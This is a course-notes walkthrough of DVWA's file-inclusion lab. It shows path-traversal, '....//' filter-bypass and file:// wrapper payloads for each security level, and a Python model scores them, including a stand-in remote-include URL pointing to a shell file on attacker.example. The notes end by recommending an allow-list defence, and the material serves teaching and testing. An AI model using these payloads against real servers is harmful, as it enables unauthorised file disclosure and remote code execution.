[Notes] NetEase Micro-Professional Web Security Engineer - 04. Web Security in Practice - 5. File Inclusion

Source: Internet
Author: User
Tags: phpinfo

File inclusion: a page dynamically includes a file named by a URL parameter (through include, require and their _once variants). When that file name is user-controllable and not strictly filtered, the flaw is easy to exploit. File inclusion vulnerabilities are divided into local file inclusion (LFI) and remote file inclusion (RFI). Remote inclusion additionally depends on the PHP configuration: allow_url_fopen must be on and, since PHP 5.2, allow_url_include as well; once those are enabled the server will include a file fetched from a remote URL.

DVWA in practice:

1. Open phpStudy or XAMPP and start Apache and MySQL. For this exercise you must specifically enable PHP's allow_url_include option: in the panel click "Other options menu" -> "PHP extensions and settings" -> "Parameter switch settings" and tick "allow_url_include".

2. In the browser open the DVWA main page, set the DVWA security level to low in the left column, then open File Inclusion.

The page shows three file options; clicking one displays that file's contents, and the URL becomes:

http://localhost/DVWA-1.9/vulnerabilities/fi/?page=file1.php

3. If we change the page parameter, can we get other files? We changed it to page=../../phpinfo.php and got that page's content without trouble (the include runs from vulnerabilities/fi/, so two levels up is the DVWA root, where phpinfo.php lives):

In this way we used the file inclusion vulnerability to obtain a page that should never have been shown to us. Looking at the server-side source, we find a single line:

$file = $_GET[ 'page' ];

With no filtering at all, the parameter is entirely attacker-controlled, which produces the file inclusion vulnerability.

4. We set the security level to medium and try the same method; it fails. Looking at the server-side source, we find two additional lines of filtering:

// Input validation
$file = str_replace( array( "http://", "https://" ), "", $file );
$file = str_replace( array( "../", "..\\" ), "", $file );

These replace "http://", "https://", "../" and "..\" with the empty string. str_replace makes a single pass and never rescans its output, the same weakness as the keyword filter in the command injection section, so we construct ....// : stripping the inner ../ leaves exactly ../ behind. Using page=....//....//phpinfo.php gives the same result as before.

5. Next we try the high level. Both methods above now fail with "ERROR: File not found!". The server-side source uses the fnmatch() function to check the page parameter: it must start with file (or be exactly include.php).

if( !fnmatch( "file*", $file ) && $file != "include.php" ) {
    // This isn't the page we want!
    echo "ERROR: File not found!";
    exit;
}

Since that is all the check does, we only need the argument to start with file. The file:// stream wrapper does exactly that, so we construct the following URL parameter:

page=file:///e:/development/kplayer/web/php/phpstudy/www/dvwa-1.9/phpinfo.php

and again get the phpinfo page.

6. Finally we look at the impossible level: none of the previous methods work. The server-side source uses an allow-list: the page parameter must be one of "include.php", "file1.php", "file2.php", "file3.php", which eliminates the file inclusion vulnerability.

// Only allow include.php or file{1..3}.php
if( $file != "include.php" && $file != "file1.php" && $file != "file2.php" && $file != "file3.php" ) {
    // This isn't the page we want!
    echo "ERROR: File not found!";
    exit;
}
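The four levels side by side, as an added example that is not DVWA's own code: a Python model of each level's check, run over constructed payloads (the walkthrough's traversal, ....// and file:// values plus a hypothetical remote URL on attacker.example), reporting whether each level rejects the value, keeps the include confined to vulnerabilities/fi/, or lets it escape. It assumes the include executes from the vulnerabilities/fi/ directory, as the URL above indicates, and resolves paths with posixpath instead of touching a filesystem.

```python
"""Model of the DVWA 1.9 file-inclusion checks at each security level.

Added example, not DVWA's code: it re-implements the checks shown above in
Python so the bypasses can be reasoned about without a running server.
"""
import fnmatch
import posixpath

# Directory the vulnerable include is executed from, relative to the DVWA
# web root (taken from the URL in the walkthrough; no real filesystem access).
FI_DIR = "vulnerabilities/fi"
ALLOWED = ("include.php", "file1.php", "file2.php", "file3.php")
LEVELS = ("low", "medium", "high", "impossible")

# Constructed payloads: the ones from the walkthrough plus a hypothetical
# remote URL (attacker.example) to show what the medium filter does to RFI.
PAYLOADS = {
    "intended": "file1.php",
    "traversal": "../../phpinfo.php",
    "double-dot-slash": "....//....//phpinfo.php",
    "file-wrapper": "file:///e:/development/kplayer/web/php/phpstudy/www/dvwa-1.9/phpinfo.php",
    "remote": "http://attacker.example/shell.txt",
}


def filter_low(page: str) -> str:
    """Low: $file = $_GET['page']; with no validation at all."""
    return page


def filter_medium(page: str) -> str:
    """Medium: mimic str_replace(), which makes one left-to-right pass per
    needle and never rescans, so "....//" collapses to "../" instead of ""."""
    for needle in ("http://", "https://", "../", "..\\"):
        page = page.replace(needle, "")
    return page


def check_high(page: str) -> bool:
    """High: fnmatch("file*", $file) || $file == "include.php".
    fnmatchcase is used because PHP's fnmatch() is case-sensitive."""
    return fnmatch.fnmatchcase(page, "file*") or page == "include.php"


def check_impossible(page: str) -> bool:
    """Impossible: exact allow-list; nothing else is ever passed to include()."""
    return page in ALLOWED


def escapes_fi_dir(page: str) -> bool:
    """True when the value would make include() read outside vulnerabilities/fi/:
    either it names a stream wrapper (file://, http://) or, after normalising
    the path, it no longer sits under FI_DIR."""
    if "://" in page:
        return True
    resolved = posixpath.normpath(posixpath.join(FI_DIR, page.replace("\\", "/")))
    return not resolved.startswith(FI_DIR + "/")


def outcome(level: str, page: str) -> str:
    """One payload at one level: "rejected" (the check refuses it), "confined"
    (include() stays inside FI_DIR) or "escaped" (it reaches another file)."""
    if level == "low":
        page = filter_low(page)
    elif level == "medium":
        page = filter_medium(page)
    elif level == "high":
        if not check_high(page):
            return "rejected"
    elif level == "impossible":
        if not check_impossible(page):
            return "rejected"
    else:
        raise ValueError(f"unknown level {level!r}")
    return "escaped" if escapes_fi_dir(page) else "confined"


def run_matrix() -> dict:
    """Evaluate every payload against every level."""
    return {name: {lvl: outcome(lvl, p) for lvl in LEVELS}
            for name, p in PAYLOADS.items()}


if __name__ == "__main__":
    for name, row in run_matrix().items():
        print(f"{name:18s}", "  ".join(f"{lvl}={res}" for lvl, res in row.items()))
```

Two details of the model are deliberate. str_replace is reproduced as a single non-rescanning pass per needle, which is exactly why ....// survives as ../ at medium while a plain ../../ is neutralised; and the high check uses fnmatchcase rather than fnmatch, because Python's fnmatch normalises case on Windows whereas PHP's fnmatch() does not. Only the impossible level rejects every non-intended payload, which is the allow-list conclusion the walkthrough reaches.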

Practical takeaways:

PHP's include(), require(), include_once() and require_once() load whatever path they are handed. When that path comes from the URL and its source is not strictly validated, the result is arbitrary file read and, if the server has allow_url_include enabled, remote inclusion and therefore arbitrary code execution. Deny-list filters like those at the medium and high levels above can be bypassed; the effective defence is an allow-list of the pages that may be included.
